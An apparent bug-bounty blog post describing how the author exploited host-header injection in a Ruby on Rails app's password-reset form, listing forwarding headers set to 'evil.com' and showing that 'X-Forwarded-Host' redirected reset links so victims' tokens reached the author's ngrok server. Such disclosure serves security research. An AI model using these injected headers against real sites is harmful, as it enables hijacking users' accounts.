Pwn Them All #BugBounty

Recently I was Pentesting a private program The web app was built on “Ruby on Rails”, I was testing it’s ‘forgot password’ functionality, of course, why not?

__HIRE ME__

I was surprised when I saw that the endpoint was vulnerable to Host-Header Injection so, here are the steps of how I was able to exploit it. First I fired up python local server running on port 8080 along with ngrok on port 80

Image for post
Image for post
python server with ngrok

I fired up my burp and firefox typed the URL again to capture the request for further testing. I typed my email in the forgot password form, when I intercept the request first I tried every header like

X-Host: evil.com
X-Server: evil.com
X-Forwarded-For: evil.com
X-Forwarded-Host: evil.com
Image for post
Image for post
password reset form
Image for post
Image for post
captured request

I tried every header and the one which worked for me here was

```X-Forwarded-Host: evil.com```

Image for post
Image for post
confirmation

Got confirmation about the email has been sent to my email

Image for post
Image for post
the host changed to mine host

Original Host replaced by the evil host (ngrok/mine host). Now victims click the link and I GET a request with the password token of the user

Image for post
Image for post
victims click and code sent to my server

fullStack | Dev Ops | Django | Flask | Vuejs | Security Researcher | Pentester | Bug Hunter | Tech Writer | Eat -> Code -> Sleep |

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store